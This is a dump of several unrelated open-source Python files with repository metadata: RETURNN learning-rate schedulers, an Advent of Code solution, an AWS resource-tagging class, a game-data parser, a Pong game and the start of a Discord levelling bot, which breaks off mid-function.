\"old_format_score\"\n        keys = []\n        if isinstance(self.error_measure_key, list):\n            for key in self.error_measure_key:\n                keys += [key, key + \"_output\"] # for multiple outputs, try default output\n        elif isinstance(self.error_measure_key, str):\n            keys += [self.error_measure_key, self.error_measure_key + \"_output\"]\n        else:\n            assert self.error_measure_key is None\n            keys += [\"dev_score\", \"dev_score_output\"]\n        for key in keys:\n            if key in epoch_data.error:\n                return key\n        for key in sorted(epoch_data.error.keys()):\n            if key == \"dev_score_output/output\" or key.startswith(\"dev_score_output/output_\"):\n                return key\n
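        # Remaining fallbacks, in order: any other dev_score_output/* key, then any\n        # dev_* key, then the train scores, and finally the alphabetically first key.\n        for key in 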
sorted(epoch_data.error.keys()):\n if key.startswith(\"dev_score_output/\"):\n return key\n for key in sorted(epoch_data.error.keys()):\n if key.startswith(\"dev_\"):\n return key\n for key in [\"train_score\", \"train_score_output\"]:\n if key in epoch_data.error:\n return key\n return min(epoch_data.error.keys())\n\n def get_epoch_error_dict(self, epoch):\n \"\"\"\n :param int epoch:\n :rtype: dict[str,float]\n \"\"\"\n if epoch not in self.epoch_data:\n return {}\n return self.epoch_data[epoch].error\n\n def get_epoch_error_value(self, epoch):\n \"\"\"\n :param int epoch:\n :return: error/score for the specific epoch, given the error-key, see :func:`get_error_key`\n :rtype: float\n \"\"\"\n error = self.get_epoch_error_dict(epoch)\n if not error:\n return None\n key = self.get_error_key(epoch)\n assert key\n assert key in error, \"%r not in %r. fix %r in config. set it to %r or so.\" % (\n key,\n error,\n \"learning_rate_control_error_measure\",\n \"dev_error\",\n )\n return error[key]\n\n def get_epoch_error_key_value(self, epoch):\n \"\"\"\n :param int epoch:\n :return: key, error\n :rtype: (str, float)\n \"\"\"\n error = self.get_epoch_error_dict(epoch)\n if not error:\n return None, None\n key = self.get_error_key(epoch)\n assert key\n assert key in error, \"%r not in %r. fix %r in config. set it to %r or so.\" % (\n key,\n error,\n \"learning_rate_control_error_measure\",\n \"dev_error\",\n )\n return key, error[key]\n\n def get_last_best_epoch(\n self,\n last_epoch,\n first_epoch=1,\n only_last_epochs=None,\n filter_score=float(\"inf\"),\n only_last_n=-1,\n min_score_dist=0.0,\n ):\n \"\"\"\n :param int first_epoch: will check all epochs >= first_epoch\n :param int last_epoch: inclusive. will check all epochs <= last_epoch\n :param int|None only_last_epochs: if set, will only check the last N epochs, inclusive\n :param float filter_score: all epochs which values over this score are not considered\n :param int only_last_n: if set (>=1), *from the resulting list*, we consider only the last only_last_n\n :param float min_score_dist: filter out epochs where the diff to the most recent is not big enough\n :return: the last best epoch. 
to get the details then, you might want to use getEpochErrorDict.\n        :rtype: int|None\n        \"\"\"\n        if only_last_epochs:\n            first_epoch = max(first_epoch, last_epoch - only_last_epochs + 1)\n        if first_epoch > last_epoch:\n            return None\n        values = [(self.get_epoch_error_key_value(ep), ep) for ep in range(first_epoch, last_epoch + 1)]\n        # Note that the order of the checks here is a bit arbitrary but I had some thoughts on it.\n        # Changing the order will also slightly change the behavior, so be sure it makes sense.\n        values = [((key, v), ep) for ((key, v), ep) in values if v is not None]\n        if not values:\n            return None\n        last_key, latest_score = values[-1][0]\n        values = [(v, ep) for ((key, v), ep) in values if key == last_key] # only same key\n        values = [(v, ep) for (v, ep) in values if v <= filter_score]\n        if not values:\n            return None\n        if only_last_n >= 1:\n            values = values[-only_last_n:]\n        values = [(v, ep) for (v, ep) in values if v + min_score_dist < latest_score]\n        if not values:\n            return None\n        return min(values)[1]\n\n    def save(self):\n        \"\"\"\n        Save the current epoch data to file (self.filename).\n        \"\"\"\n        if not self.filename:\n            return\n        directory = os.path.dirname(self.filename)\n        if directory and not os.path.exists(directory):\n            os.makedirs(directory, exist_ok=True)\n        # First write to a temp-file, to be sure that the write happens without errors.\n        # Otherwise, it could happen that we delete the old existing file, then\n        # some error happens (e.g. disk quota), and we lose the newbob data.\n        # Losing that data is very bad because it basically means that we have to redo all the training.\n        tmp_filename = self.filename + \".new_tmp\"\n        f = open(tmp_filename, \"w\")\n        f.write(better_repr(self.epoch_data))\n        f.write(\"\\n\")\n        f.close()\n        os.rename(tmp_filename, self.filename)\n\n    def load(self):\n        \"\"\"\n        Loads the saved epoch data from file (self.filename).\n        \"\"\"\n
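        # The file contains a Python-literal dict, e.g. (illustrative values):\n        #   {1: EpochData(learningRate=0.001, error={'dev_score': 2.541}),\n        #    2: EpochData(learningRate=0.0005, error={'dev_score': 2.103})}\n        s = open(self.filename).read()\n        self.epoch_data = eval(s, {\"nan\": float(\"nan\"), \"inf\": float(\"inf\")}, ObjAsDict(self))\n\n\nclass ConstantLearningRate(LearningRateControl):\n    \"\"\"\n    Just a constant learning rate.\n    \"\"\"\n\n    need_error_info = False\n\n    def calc_learning_rate_for_epoch(self, epoch):\n        \"\"\"\n        Dummy constant learning rate. 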
Returns initial learning rate.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n while True:\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n epoch = last_epoch\n continue\n return learning_rate\n\n\nclass NewbobRelative(LearningRateControl):\n \"\"\"\n If relative diff between old and new error is over some threshold, decay learning rate.\n \"\"\"\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobRelative, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"relative_error_threshold\": config.float(\"newbob_relative_error_threshold\", -0.01),\n }\n )\n return kwargs\n\n def __init__(self, relative_error_threshold, **kwargs):\n \"\"\"\n :type relative_error_threshold: float\n \"\"\"\n super(NewbobRelative, self).__init__(**kwargs)\n self.relative_error_threshold = relative_error_threshold\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n return self.default_learning_rate\n last2_epoch = self.get_last_epoch(last_epoch)\n if last2_epoch is None:\n return learning_rate\n relative_error = self.calc_relative_error(last2_epoch, last_epoch)\n if relative_error is None:\n return learning_rate\n learning_rate = self.calc_learning_rate_decay_or_grow(\n learning_rate, decay=relative_error > self.relative_error_threshold\n )\n return learning_rate\n\n\nclass NewbobAbs(LearningRateControl):\n \"\"\"\n If absolute diff between old and new error is over some threshold, decay learning rate.\n \"\"\"\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobAbs, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"error_threshold\": config.float(\"newbob_error_threshold\", -0.01),\n }\n )\n return kwargs\n\n def __init__(self, error_threshold, **kwargs):\n \"\"\"\n :type error_threshold: float\n \"\"\"\n super(NewbobAbs, self).__init__(**kwargs)\n self.error_threshold = error_threshold\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n last_epoch = self.get_last_epoch(epoch)\n if last_epoch is None:\n return self.default_learning_rate\n learning_rate = self.epoch_data[last_epoch].learning_rate\n if learning_rate is None:\n return self.default_learning_rate\n last2_epoch = self.get_last_epoch(last_epoch)\n if last2_epoch is None:\n return learning_rate\n old_key, old_error = self.get_epoch_error_key_value(last2_epoch)\n new_key, new_error = self.get_epoch_error_key_value(last_epoch)\n if old_error is None or new_error is None:\n return learning_rate\n if old_key != new_key:\n return learning_rate\n error_diff = new_error - old_error\n learning_rate = self.calc_learning_rate_decay_or_grow(learning_rate, decay=error_diff > self.error_threshold)\n return learning_rate\n\n\nclass NewbobMultiEpoch(LearningRateControl):\n \"\"\"\n Like :class:`NewbobRelative`, but looks at the average relative 
error over multiple epochs.\n This is useful together with ``partition_epoch`` from :class:`Dataset`.\n \"\"\"\n\n @classmethod\n def load_initial_kwargs_from_config(cls, config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: dict[str]\n \"\"\"\n kwargs = super(NewbobMultiEpoch, cls).load_initial_kwargs_from_config(config)\n kwargs.update(\n {\n \"num_epochs\": config.int(\"newbob_multi_num_epochs\", 5),\n \"update_interval\": config.int(\"newbob_multi_update_interval\", config.int(\"newbob_multi_num_epochs\", 5)),\n \"relative_error_threshold\": config.float(\"newbob_relative_error_threshold\", -0.01),\n \"relative_error_grow_threshold\": config.float(\n \"newbob_relative_error_grow_threshold\", config.float(\"newbob_relative_error_threshold\", -0.01)\n ),\n }\n )\n return kwargs\n\n def __init__(self, num_epochs, update_interval, relative_error_threshold, relative_error_grow_threshold, **kwargs):\n \"\"\"\n :param int num_epochs:\n :param int update_interval:\n :param float relative_error_threshold:\n :param float relative_error_grow_threshold:\n \"\"\"\n super(NewbobMultiEpoch, self).__init__(**kwargs)\n self.num_epochs = num_epochs\n assert self.num_epochs >= 1\n self.update_interval = update_interval\n assert self.update_interval >= 1\n self.relative_error_threshold = relative_error_threshold\n self.relative_error_grow_threshold = relative_error_grow_threshold\n\n def _calc_mean_relative_error(self, epochs):\n \"\"\"\n :param list[int] epochs:\n :return: mean of relative errors\n :rtype: float|None\n \"\"\"\n assert len(epochs) >= 2\n errors = [self.calc_relative_error(epochs[i], epochs[i + 1]) for i in range(len(epochs) - 1)]\n if any([e is None for e in errors]):\n return None\n return float(numpy.mean(errors))\n\n def _calc_recent_mean_relative_error(self, epoch):\n \"\"\"\n :param int epoch:\n :return: recent mean of relative errors\n :rtype: float|None\n \"\"\"\n # Take one more than numEpochs because we are looking at the diffs.\n last_epochs = self._last_epochs_for_epoch(epoch, num_epochs=self.num_epochs + 1)\n if not last_epochs:\n return None\n # We could also use the self.numEpochs limit here. 
But maybe this is better.\n if len(last_epochs) <= 1:\n return None\n return self._calc_mean_relative_error(last_epochs)\n\n def calc_learning_rate_for_epoch(self, epoch):\n \"\"\"\n Newbob+ on train data.\n :type epoch: int\n :returns learning rate\n :rtype: float\n \"\"\"\n learning_rate = self.get_most_recent_learning_rate(epoch)\n # We start counting epochs at 1.\n if self.update_interval > 1 and epoch % self.update_interval != 1:\n return learning_rate\n mean_relative_error = self._calc_recent_mean_relative_error(epoch)\n if mean_relative_error is None:\n return learning_rate\n learning_rate = self.calc_learning_rate_decay_or_grow(\n learning_rate,\n decay=mean_relative_error > self.relative_error_threshold,\n grow=mean_relative_error < self.relative_error_grow_threshold,\n )\n return learning_rate\n\n\ndef learning_rate_control_type(type_name):\n \"\"\"\n :param str type_name:\n :rtype: type[LearningRateControl]|LearningRateControl\n \"\"\"\n if type_name == \"constant\":\n return ConstantLearningRate\n elif type_name in (\"newbob\", \"newbob_rel\", \"newbob_relative\"): # Old setups expect the relative version.\n return NewbobRelative\n elif type_name == \"newbob_abs\":\n return NewbobAbs\n elif type_name == \"newbob_multi_epoch\":\n return NewbobMultiEpoch\n else:\n assert False, \"unknown learning-rate-control type %s\" % type_name\n\n\ndef load_learning_rate_control_from_config(config):\n \"\"\"\n :type config: returnn.config.Config\n :rtype: LearningRateControl\n \"\"\"\n control_type = config.value(\"learning_rate_control\", \"constant\")\n cls = learning_rate_control_type(control_type)\n return cls.load_initial_from_config(config)\n\n\ndef demo():\n \"\"\"\n Demo run. Given some learning rate file (with scores / existing lrs), will calculate how lrs would have been set,\n given some config.\n \"\"\"\n from returnn.util import better_exchook\n\n better_exchook.install()\n import returnn.__main__ as rnn\n import sys\n\n if len(sys.argv) <= 1:\n print(\"usage: python %s [config] [other options] [++check_learning_rates 1]\" % __file__)\n print(\n (\n \"example usage: \"\n \"python %s ++learning_rate_control newbob ++learning_rate_file newbob.data ++learning_rate 0.001\"\n )\n % __file__\n )\n rnn.init_config(command_line_options=sys.argv[1:])\n # noinspection PyProtectedMember\n rnn.config._hack_value_reading_debug()\n rnn.config.update({\"log\": []})\n rnn.init_log()\n rnn.init_backend_engine()\n check_lr = rnn.config.bool(\"check_learning_rates\", False)\n from returnn.pretrain import pretrain_from_config\n\n pretrain = pretrain_from_config(rnn.config)\n first_non_pretrain_epoch = 1\n pretrain_learning_rate = None\n if pretrain:\n first_non_pretrain_epoch = pretrain.get_train_num_epochs() + 1\n log.initialize(verbosity=[5])\n control = load_learning_rate_control_from_config(rnn.config)\n print(\"LearningRateControl: %r\" % control)\n if not control.epoch_data:\n print(\"No epoch data so far.\")\n return\n first_epoch = min(control.epoch_data.keys())\n if first_epoch != 1:\n print(\"Strange, first epoch from epoch data is %i.\" % first_epoch)\n print(\"Error key: %s from %r\" % (control.get_error_key(epoch=first_epoch), control.epoch_data[first_epoch].error))\n if pretrain:\n pretrain_learning_rate = rnn.config.float(\"pretrain_learning_rate\", control.default_learning_rate)\n max_epoch = max(control.epoch_data.keys())\n for epoch in range(1, max_epoch + 2): # all epochs [1..max_epoch+1]\n old_learning_rate = None\n if epoch in control.epoch_data:\n old_learning_rate = 
control.epoch_data[epoch].learning_rate\n if epoch < first_non_pretrain_epoch:\n learning_rate = pretrain_learning_rate\n s = \"Pretrain epoch %i, fixed learning rate: %s (was: %s)\" % (epoch, learning_rate, old_learning_rate)\n elif 1 < first_non_pretrain_epoch == epoch:\n learning_rate = control.default_learning_rate\n s = \"First epoch after pretrain, epoch %i, fixed learning rate: %s (was %s)\" % (\n epoch,\n learning_rate,\n old_learning_rate,\n )\n else:\n learning_rate = control.calc_new_learning_rate_for_epoch(epoch)\n s = \"Calculated learning rate for epoch %i: %s (was: %s)\" % (epoch, learning_rate, old_learning_rate)\n if learning_rate < control.min_learning_rate:\n learning_rate = control.min_learning_rate\n s += \", clipped to %s\" % learning_rate\n s += \", previous relative error: %s\" % control.calc_relative_error(epoch - 2, epoch - 1)\n if hasattr(control, \"_calc_recent_mean_relative_error\"):\n # noinspection PyProtectedMember\n s += \", previous mean relative error: %s\" % control._calc_recent_mean_relative_error(epoch)\n print(s)\n if check_lr and old_learning_rate is not None:\n if old_learning_rate != learning_rate:\n print(\"Learning rate is different in epoch %i!\" % epoch)\n sys.exit(1)\n # Overwrite new learning rate so that the calculation for further learning rates stays consistent.\n if epoch in control.epoch_data:\n control.epoch_data[epoch].learning_rate = learning_rate\n else:\n control.epoch_data[epoch] = control.EpochData(learningRate=learning_rate)\n print(\"Finished, last stored epoch was %i.\" % max_epoch)\n\n\nif __name__ == \"__main__\":\n demo()\n","repo_name":"rwth-i6/returnn","sub_path":"returnn/learning_rate_control.py","file_name":"learning_rate_control.py","file_ext":"py","file_size_in_byte":33063,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"71979419688","text":"rows = [n for n in open('d3in.txt').read().splitlines()]\n\ntrees = [[x == '#' for x in row] for row in rows]\n\nh, w = len(rows), len(trees[0])\nslopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\nproduct = 1\n\nfor dx, dy in slopes:\n\n count = 0\n x, y = 0, 0\n while y < h:\n count += 1 if trees[y][x] else 0\n x = (x+dx) % w\n y += dy\n\n product *= count\n\nprint(product)\n","repo_name":"AlexMabry/aoc20","sub_path":"day03/d3b.py","file_name":"d3b.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888222249","text":"from typing import List\n\nimport boto3 as boto3\n\nfrom src.core.aws.base_aws_service import BaseAwsService\nfrom src.model.filter import Filter\nfrom src.model.resource import Resource\nfrom src.model.tag import Tag\n\n\nclass KinesisDataAnalytics(BaseAwsService):\n\n def __init__(self):\n super().__init__(nice_name='Kinesis Data Analytics', short_name='kda')\n self.client = boto3.client('kinesisanalytics')\n\n def _list_resources(self, filters: List[Filter]) -> List[Resource]:\n \"\"\"\n List resources for the service.\n\n :param filters: List of filters to pass to AWS API, if supported.\n :return: List of resources.\n \"\"\"\n limit = 50\n response = self.client.list_applications(Limit=limit)\n resources = self.__list_response_to_resources(response)\n\n while response['HasMoreApplications']:\n response = self.client.list_applications(Limit=limit, ExclusiveStartApplicationName=resources[-1].name)\n resources += [\n Resource(name=app['ApplicationName'], arn=app['ApplicationARN'])\n for app in 
response['ApplicationSummaries']\n            ]\n\n        return resources\n\n    @staticmethod\n    def __list_response_to_resources(response) -> List[Resource]:\n        \"\"\"\n        Convert a List API call response to a list of resources.\n\n        :param response: Response from the List API call.\n        :return: List of resources.\n        \"\"\"\n        resources = [\n            Resource(name=item['ApplicationName'], arn=item['ApplicationARN'])\n            for item in response['ApplicationSummaries']\n        ]\n\n        return resources\n\n    def get_resource(self, resource_name: str) -> Resource:\n        \"\"\"\n        Get a single resource.\n\n        :param resource_name: Name of the resource.\n        :return: Resource.\n        \"\"\"\n        response = self.client.describe_application(ApplicationName=resource_name)\n        arn = response['ApplicationDetail']['ApplicationARN']\n        resource = Resource(name=resource_name, arn=arn)\n\n        return resource\n\n    def _get_resource_tags(self, resource: Resource) -> List[Tag]:\n        \"\"\"\n        Get all tags for the given resource.\n\n        :param resource: Resource.\n        :return: List of tags for the resource.\n        \"\"\"\n        response = self.client.list_tags_for_resource(ResourceARN=resource.arn)\n        tags = response['Tags']\n        tags = [Tag(tag['Key'], tag['Value']) for tag in tags]\n\n        return tags\n\n    def tag_resource(self, resource: Resource, tags: List[Tag]) -> None:\n        \"\"\"\n        Tag a resource with the given tags.\n\n        :param resource: Resource.\n        :param tags: List of tags to apply to the resource.\n        \"\"\"\n        tags = [{'Key': tag.key, 'Value': tag.value} for tag in tags]\n        self.client.tag_resource(\n            ResourceARN=resource.arn,\n            Tags=tags\n        )\n","repo_name":"dnzprmksz/aws-tagger","sub_path":"src/core/aws/kinesis_data_analytics.py","file_name":"kinesis_data_analytics.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75052936488","text":"from RePoE.parser.util import write_json, call_with_default_args\nfrom RePoE.parser import Parser_Module\n\n\ndef _convert_alias_stats(alias_stats_key_1, alias_stats_key_2):\n    r = {}\n    if alias_stats_key_1 is not None:\n        r[\"when_in_main_hand\"] = alias_stats_key_1[\"Id\"]\n    if alias_stats_key_2 is not None:\n        r[\"when_in_off_hand\"] = alias_stats_key_2[\"Id\"]\n    return r\n\n\nclass stats(Parser_Module):\n    @staticmethod\n    def write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):\n        root = {}\n        previous = set()\n        for stat in relational_reader[\"Stats.dat\"]:\n            if stat[\"Id\"] in previous:\n                print(\"Duplicate stat id %s\" % stat[\"Id\"])\n                continue\n            previous.add(stat[\"Id\"]) # record the id so the duplicate check above can actually trigger\n            root[stat[\"Id\"]] = {\n                \"is_local\": stat[\"IsLocal\"],\n                \"is_aliased\": stat[\"IsWeaponLocal\"],\n                \"alias\": _convert_alias_stats(stat[\"MainHandAlias_StatsKey\"], stat[\"OffHandAlias_StatsKey\"]),\n                # 'is_on_character_panel': stat['Flag6'], # not sure\n                # 'is_on_tooltip': stat['Flag7'], # not sure\n            }\n\n        write_json(root, data_path, \"stats\")\n\n\nif __name__ == \"__main__\":\n    call_with_default_args(stats.write)\n","repo_name":"brather1ng/RePoE","sub_path":"RePoE/parser/modules/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"53"} +{"seq_id":"86737720664","text":"MAX = 100\nnome = list(range(MAX)) # pre-allocates a list with MAX slots; the range values are overwritten below\ncontador = 0\n\nwhile contador < MAX:\n    nome[contador] = str(input(\"Enter the name of person {}: \".format(contador+1)))\n    contador += 1\ncontador = 0\nprint(\"\\nList of names: \")\nwhile contador < MAX:\n    print(nome[contador])\n    contador += 
1\n\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista9/Exercicio1.py","file_name":"Exercicio1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40100974525","text":"import pygame\nimport math\nimport random\nimport helper\nimport config\nfrom helper import make_vector\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, bounds, radius, velocity_vector):\n super().__init__()\n\n self.velocity = velocity_vector\n self.bounds = bounds\n self.position = make_vector(self.bounds.centerx, self.bounds.centery)\n\n self.image = config.BALL_SURFACE\n\n self.rect = pygame.Rect(0, 0, radius * 2, radius * 2)\n self.rect.center = self.position\n\n @staticmethod\n def _intersects_paddle(ball_position, paddle):\n for segment in paddle.get_line_segments():\n if len(helper.line_circle_intersection(ball_position, config.BALL_RADIUS, segment[0], segment[1])) > 0:\n return True\n\n return False\n\n def _sort_by_least_distance_squared(self, value):\n delta_x = self.position.x - value[0].x\n delta_y = self.position.y - value[0].y\n\n return delta_x * delta_x + delta_y * delta_y\n\n @staticmethod\n def _get_distance(v1, v2):\n delta_x = v1.x - v2.x\n delta_y = v1.y - v2.y\n\n return math.sqrt(delta_x * delta_x + delta_y * delta_y)\n\n def update(self, elapsed_seconds, paddles):\n delta_position = self.velocity * elapsed_seconds\n\n ball_start = self.position\n ball_end = ball_start + delta_position\n\n # ball is on field, determine whether it has collided with any paddles\n old_rect = self.rect.copy()\n\n # temporarily update rect to make use of spritecollide\n self.rect.center = ball_end\n colliding_paddles = pygame.sprite.spritecollide(self, paddles, dokill=False)\n self.rect = old_rect\n\n if any([Ball._intersects_paddle(ball_end, paddle) for paddle in colliding_paddles]):\n # at least one collision has occurred; determine closest intersection point\n all_intersections = []\n\n for paddle in colliding_paddles:\n for segment in paddle.get_line_segments():\n closest_point = helper.closest_point_on_line(segment[0], segment[1], self.position)\n\n intersections = helper.line_line_intersection(ball_start, closest_point, segment[0], segment[1])\n\n if len(intersections) > 0:\n all_intersections.extend([(x, segment[0], segment[1], paddle, closest_point)\n for x in intersections if x is not None])\n\n if len(all_intersections) > 0:\n all_intersections.sort(key=self._sort_by_least_distance_squared)\n\n # get the segment that we were closest to\n nearest_segment = all_intersections[0]\n segment_start, segment_end = nearest_segment[1], nearest_segment[2]\n\n # find closest point on this segment to the ball\n closest_point = helper.closest_point_on_line(segment_start, segment_end, ball_end)\n\n # adjust position of ball such that this distance is the ball's radius\n segment_dir = (segment_end - segment_start).normalize()\n segment_normal = make_vector(segment_dir.y, -segment_dir.x)\n\n projected_dir = (self.velocity.dot(segment_normal)\n / (segment_normal.dot(segment_normal)) * segment_normal)\n\n # projected_dir now tells us how to move towards the nearest segment; we can use this to\n # ensure we're at least {radius} units away\n if self.velocity.magnitude() > 0:\n self.position = closest_point + -projected_dir.normalize() * config.BALL_RADIUS\n delta_position = pygame.Vector2() # overwrote delta for this frame\n Ball.play_sound()\n\n # adjust velocity based on the 
segment that was hit\n paddle = all_intersections[0][3]\n up = make_vector(0, 1)\n\n is_vertical = True if abs(up.dot(segment_dir)) > 0.98 else False\n\n if is_vertical:\n self.velocity.x = -self.velocity.x\n self.velocity.y += paddle.velocity.y * elapsed_seconds * config.PADDLE_BALL_VELOCITY_MODIFIER\n else:\n self.velocity.x += paddle.velocity.x * elapsed_seconds * config.PADDLE_BALL_VELOCITY_MODIFIER\n self.velocity.y = -self.velocity.y\n\n self.position += delta_position\n self.rect.center = self.position\n\n def get_position(self):\n return self.position\n\n @staticmethod\n def play_sound():\n num_sounds = len(config.PADDLE_BOUNCE_SOUNDS)\n\n if num_sounds == 0:\n return\n\n which = config.PADDLE_BOUNCE_SOUNDS[random.randint(0, len(config.PADDLE_BOUNCE_SOUNDS) - 1)]\n which.play()\n\n\nclass MovementDirection:\n LEFT = make_vector(-1, 0)\n RIGHT = make_vector(1, 0)\n UP = make_vector(0, -1)\n DOWN = make_vector(0, 1)\n STOP = make_vector()\n\n\nclass Paddle(pygame.sprite.Sprite):\n def __init__(self, paddle_bounds, movement_bounds, speed):\n super().__init__()\n self.velocity = pygame.Vector2()\n self.position = pygame.Vector2()\n self.speed = speed\n\n self.paddle_bounds = paddle_bounds.copy()\n self.movement_bounds = movement_bounds.copy()\n\n self.movement_bounds.width -= paddle_bounds.width\n self.movement_bounds.height -= paddle_bounds.height\n\n self.movement_bounds.width = self.movement_bounds.width if self.movement_bounds.width > 0 else 1\n self.movement_bounds.height = self.movement_bounds.height if self.movement_bounds.height > 0 else 1\n\n self.movement_bounds.left += paddle_bounds.width * 0.5\n self.movement_bounds.top += paddle_bounds.height * 0.5\n\n self.image = config.HORIZONTAL_PADDLE_SURFACE \\\n if paddle_bounds.width > paddle_bounds.height else config.VERTICAL_PADDLE_SURFACE\n\n self.rect = paddle_bounds.copy()\n\n self.position.x = self.movement_bounds.centerx\n self.position.y = self.movement_bounds.centery\n self.update(0.0) # set up rect to match position\n\n def update(self, elapsed):\n move_amount = self.velocity * elapsed\n\n self.position += move_amount\n\n helper.rect_clamp_point_ip(self.movement_bounds, self.position)\n\n self.rect.centerx = self.position.x\n self.rect.centery = self.position.y\n\n def move(self, direction=MovementDirection.STOP):\n self.velocity = direction * self.speed\n\n def get_position(self):\n return self.position\n\n def get_dimensions(self):\n return helper.Dimensions(self.rect.width, self.rect.height)\n\n def get_line_segments(self):\n top_left = make_vector(self.rect.left, self.rect.top)\n top_right = make_vector(self.rect.right, self.rect.top)\n bottom_right = make_vector(self.rect.right, self.rect.bottom)\n bottom_left = make_vector(self.rect.left, self.rect.bottom)\n\n return [(top_left, top_right), (top_right, bottom_right), (bottom_right, bottom_left), (bottom_left, top_left)]\n\n\nclass Net(pygame.sprite.Sprite):\n def __init__(self, board_bounds, net_width, dash_length, dash_color=(255, 255, 255)):\n super().__init__()\n\n # generate an appropriate net surface - no sense in doing this\n # every single frame\n self.rect = pygame.Rect(0, 0, net_width, board_bounds.height)\n self.rect.center = board_bounds.center\n\n self.image = pygame.Surface((net_width, board_bounds.height))\n\n self.image.fill(color=(0, 0, 0)) # fill with black\n\n # generate dashes\n dash_rect = pygame.Rect(0, 0, net_width, dash_length)\n dash_rect.centery = 0\n\n # calculate offset such that the first and last dash will have the\n # same amount of 
space between their edge and the edge of the board\n num_dashes = self.image.get_height() / (dash_length * 2)\n offset = int((num_dashes - math.floor(num_dashes)) * dash_length)\n\n for y in range(offset, self.image.get_height() + dash_length + offset, dash_length * 2):\n fill_rect = dash_rect.copy()\n fill_rect.centery = y\n fill_rect.clip(self.image.get_rect())\n\n self.image.fill(color=dash_color, rect=fill_rect)\n\n\nclass TextSprite(pygame.sprite.Sprite):\n def __init__(self, text=\"\", font=\"consolas\", size=16, color=(255, 255, 255)):\n super().__init__()\n self.text = text\n self.font = pygame.sysfont.SysFont(font, size)\n self.color = color\n self.rect = pygame.Rect(0, 0, size, size)\n self.__update_image()\n\n def __update_image(self):\n self.image = self.font.render(self.text, False, self.color)\n self.rect.width = self.image.get_width()\n self.rect.height = self.image.get_height()\n\n def set_position(self, position):\n self.rect.left = position.x\n self.rect.top = position.y\n\n def set_center(self, center_position):\n self.rect.center = center_position\n\n def get_position(self):\n return make_vector(self.rect.left, self.rect.top)\n\n def set_text(self, text):\n self.text = text\n self.__update_image()\n","repo_name":"amrazek/386-pong-no-walls","sub_path":"entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237831216","text":"import discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport datetime\r\nimport json\r\nimport requests\r\nfrom PIL import Image, ImageOps, ImageDraw, ImageFont\r\nfrom datetime import datetime,timedelta\r\nfrom datetime import date as dt\r\nimport re \r\nfrom dateutil import parser\r\nimport random\r\nfrom discord.ext.commands import has_permissions\r\nintents = discord.Intents.all()\r\nbot = commands.Bot(command_prefix = '.',case_insensitive=True,intents = intents)\r\n\r\nbot.remove_command('help')\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n try:\r\n author = str(message.author.id)\r\n with open('Config/data.json','r') as f:\r\n data = json.load(f)\r\n \r\n if not author in data:\r\n data[author] = {}\r\n data[author]['experience'] = 0\r\n data[author]['level'] = 0\r\n data[author]['money'] = 1100\r\n with open('Config/data.json','w') as f:\r\n json.dump(data,f,indent = 3)\r\n\r\n with open('Config/data.json','r') as f:\r\n data = json.load(f)\r\n \r\n level = data[author]['level']\r\n if level == 0:\r\n level_end = 350\r\n elif level== 1:\r\n level_end = 910\r\n elif level== 2:\r\n level_end = 1110\r\n elif level == 3:\r\n level_end = 1350\r\n elif level == 4:\r\n level_end = 1500\r\n elif level == 5:\r\n level_end = 1790\r\n elif level == 6:\r\n level_end = 1800\r\n elif level == 7:\r\n level_end = 1850\r\n elif level == 8:\r\n level_end = 1900\r\n elif level == 9:\r\n level_end = 1950\r\n elif level == 10:\r\n level_end = 2000\r\n else:\r\n level_end = 2500\r\n\r\n if data[author]['experience'] >= level_end:\r\n data[author]['level'] += 1\r\n level = level + 1\r\n data[author]['experience'] = 0\r\n url = message.author.avatar_url\r\n with requests.get(url) as r:\r\n img_data = r.content\t\r\n \r\n with open('image_name.webp', 'wb') as handler:\r\n handler.write(img_data)\r\n\r\n im = Image.open('image_name.webp')\r\n region = im.resize((105, 105))\r\n background = Image.open('Config/r.png')\r\n background.paste(region,(5,4))\r\n d2 = Image.open('Config/12.png')\r\n 
